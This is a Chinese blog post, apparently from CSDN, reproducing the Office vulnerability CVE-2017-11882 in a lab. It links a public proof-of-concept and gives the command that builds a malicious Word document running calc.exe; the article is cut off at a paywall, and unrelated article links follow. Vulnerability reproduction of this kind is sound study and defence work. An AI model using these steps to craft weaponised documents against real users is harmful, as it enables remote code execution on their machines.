CVE 2017-11882 office缓存溢出漏洞复现

最新推荐文章于 2024-12-25 10:26:59 发布
最新推荐文章于 2024-12-25 10:26:59 发布
阅读量571 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/BROTHERYY/article/details/109104378
版权
本文详细介绍了CVE-2017-11882 Office缓存溢出漏洞,包括漏洞概述、影响版本、复现环境和步骤。通过在Kali Linux上使用POC代码,针对Win7上的Office 2016进行测试,成功生成并运行了带有shell的后门Word文件。建议用户及时更新系统和打补丁以防止此类漏洞攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.漏洞概述

针对这个漏洞,微软在2017年11月14号,推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。
这里是poc地址

https://github.com/unamer/CVE-2017-11882

2.影响版本

office 2003
office 2007
office 2010
office 2013
office 2016

3.复现环境

渗透机:kali + POC代码【上述github地址】
靶机:Win7 + Office 2016

4.复现步骤

4.1 下载Office 2016 和POC

Office2016 下载地址:http://www.downcc.com/soft/290076.html

4.2 使用下载的POC进行测试

python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o calc.doc
python CVE-2017-11882.py -c
最低0.47元/天 解锁文章
Linux 使用 Docker 安装 memos 备忘录
lpyun@aliyun.com
03-13 999
一个轻量级的自我托管备忘录中心。开源,永远免费。备忘录提供了创新者在灵感时刻所需的隐私安全和可靠性。memos 官网。
内网穿透工具cpolar简介
wjCwl的博客
01-15 4969
文章目录一、需求描述二、安装和使用三、平时使用 一、需求描述 做后端,需要和前端联调,之前写的垃圾代码要修改的地方太多了,每次修改后需要保存到gitlab,打包,再部署到服务器上,前端才能访问,访问出毛病又要改重新走一遍上面的流程。太费事了。师兄告诉我们可以通过内网穿透来解决。自己找到了一个好用的内网穿透工具cpolar,小巧简单免费,介绍给大家。 二、安装和使用 Windows用户如何安装Cpolar工具 【官方介绍的就很好,不多讲,按流程来,没有遇到bug】 再贴一个官网
【开源项目分享】GitHub中文排行榜 - 帮助你发现高分优秀中文项目-Java
稻草人的技术小站
04-24 2925
榜单设立目的 ???????? GitHub中文排行榜,帮助你发现高分优秀中文项目; 各位开发者伙伴可以更高效地吸收国人的优秀经验、成果; 中文项目只能满足阶段性的需求,想要有进一步提升,还请多花时间学习高分神级英文项目; 榜单设立范围 设立1个总榜(所有语言项目汇总排名)、18个分榜(单个语言项目排名); 榜单入选规则 一个小小的要求:项目的 Description 和 README.md 都要包含中文说明; 更新越持续越好:最近半年内有更新过的项目才有机会入选(拥抱活跃,远离僵尸); Star
使用内网穿透工具进行支付宝沙箱环境支付的SDK接口远程测试
weixin_46151178的博客
10-31 410
点击左侧仪表盘的状态——在线隧道列表,可以看到刚刚创建的隧道已经有生成了相应的公网地址,一个http协议,一个https协议(免去配置ssl证书的繁琐步骤),将其复制想下来。以上调用sdk创建支付单的服务运行在本地,局限性在于只能本地的项目才能调用测试支付的接口,如果想要远程也可以调用,需要把服务暴露到公网。,登录cpolar web UI管理界面,点击左侧仪表盘的隧道管理——隧道列表,找到支付接口测试隧道,点击右侧的编辑。编写一个接口,为了方便演示,创建get请求,订单信息写死在代码中。
内网穿透工具Cpolar 食用指南
kft1314的博客
08-15 2927
运行此命令会将您帐户的authtoken添加到您的cpolar.yml文件中。这将为您提供更多功能,所有打开的隧道将在此处的仪表板中列出。./cpolar http 80 >nohup.out 2>&1 & #后台启动。缺点:免费有限 重启后会随机重新分配域名,收费版本可以选择域名。然后回到网页,查看自映射后的外网地址。我们首先访问cpolar官网。我们首先访问cpolar官网。其他的功能自行研究吧!
cpolar---亲测超级好用的永久免费内网穿透无需公网IP
最新发布
u013758456的专栏
12-25 1026
4、左侧仪表盘——状态——在线隧道列表,可以看到已经更新了的公网地址。,登录cpolar web-ui管理界面。3、左侧仪表盘——隧道管理——隧道列表。2、浏览器访问本地9200端口,1、选择“China VIP”5、使用固定TCP地址远程桌面。
2022年10月 cpolar软件实现内网穿透连接群晖NAS
热门推荐
微软MVP Eleven
10-15 3万+
cpolar是一款拥有远程控制和内网穿透功能的软件。而且还可以监控端口的HTTP请求,利用实时的cpolar Web UI开发者工具,让您调试代码更容易。您可以监听所有隧道上的HTTP消息包,分析消息包的结构内容,找出问题点。还可以单击重放(Replay)按钮,重新发送该HTTP信令请求。
cpolar的基础使用方法
2301_78420308的博客
08-10 1025
群晖作为大容量存储系统,既可以作为个人的私有存储设备,也可以放在小型企业中作为数据中心使用。其强大的数据存储和管理功能,让其还能够胜任更多任务。但由于群晖的应用场景所限,这些功能通常只能在局域网内实现,想要让群晖NAS存储的数据能在公网访问到,我们可以借助cpolar的辅助,轻松实现在公共互联网访问内网群晖NAS上的数据。在这之前,我们还是需要了解下cpolar的基本操作方式。
Hexo Moments JS: 轻量级朋友圈网页模板爬虫部署
它通过JavaScript实现了一种轻量级的网页模板加载方式,能够动态地加载朋友圈内容,用户不需要刷新页面即可看到新内容。 ### 知识点二:爬虫配置API地址修改 爬虫是一种自动获取网页内容的程序,可以模拟人类...
matlab.rar_matlab 矩量法_method of moments_、矩量法_矩量法matlab_网格划分matla
07-14
本资源主要关注的是在MATLAB环境中实现矩量法(Method of Moments, MoM)的一种方法,这是一种用于求解电磁问题的数值计算技术。 矩量法是基于边界条件的数值方法,它通过将复杂的物理系统离散化为一系列小的几何...
method_of_moments.rar_method_of_moments_moment_电磁场矩量法_电磁积分方程
09-22
矩量法(Method of Moments,MoM)是电磁场计算中的一个重要方法,它在解决复杂的电磁问题时,尤其是在处理开放区域或结构复杂的目标物体时,展现出显著的优势。该方法基于格林函数理论,通过将物体表面的电流分布...
fsort:文件内容的轻量级气泡排序器
03-07
它是文件内容的轻量级气泡排序器 它可以对文件中的内容进行排序 这么说吧,您有一个文件gamer-moments.txt ,文件内容为: 10 12 4 12 5 7 4 以及如何对它们进行排序? 使用fsort非常容易! 在Linux上 只需编译...
内网穿透工具(一) -- Cpolar 简介
dazhong2012的专栏
10-28 2966
cpolar是一种安全的内网穿透云服务,它将内网下的本地服务器通过安全隧道暴露至公网。使得公网用户可以正常访问内网服务。这意味着即使服务器位于防火墙或NAT之后,公网用户也能正常访问您的内网服务。cpolar提供了一种简单、快速且安全的方式来实现远程访问和数据传输。
远程办公并不难 cpolar轻松实现
10-10 2034
最后,我们在cpolar客户端左侧的“状态”项下,找到“在线隧道列表”,就能看到这条数据隧道的入口(即公网地址),我们只要将这个公网地址粘贴到其他地方的电脑远程桌面程序中(比如家里的电脑),就能实现在公司以外的电脑上,以远程桌面的方式,操作办公室的电脑,就像我们真的在办公室操作办公电脑一样,达到远程办公的目的。完成注册并升级至专业套餐后,我们在“仪表盘”界面左侧,找到“预留”按钮,设置一条空白的TCP-IP隧道,为我们建立远程办公数据隧道做好准备。首先在办公室的电脑上,安装一个cpolar软件。
使用cpolar实现内网穿透
weixin_68256171的博客
02-19 2889
使用cpolar可以实现免费的内网穿透,但缺点是每次启动HTTP隧道的网址都不固定,若需固定网址,需付费。使用xftp将安装压缩包传到Linux端的根目录(\)下。使用图片中的网站地址即可访问到zy下的网页文件。使用xftp将所需文件(zy)上传到根目录下。此时可用IP地址访问到zy下的网页文件。
内网穿透工具Cpolar使用方法
WuHao的博客
09-03 1065
内网穿透工具Cpolar免费使用方法
使用cpolar实现内网穿透,将Web项目部署到公网上
聂可以的博客
05-27 6588
使用cpolar实现内网穿透,将Web项目部署到公网上
在外地ssh远程连接家里ubuntu服务器(Coplar内网穿透)
Talk is cheap, show me the code!
08-01 1515
【代码】在外地ssh远程连接家里ubuntu服务器(Coplar内网穿透)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值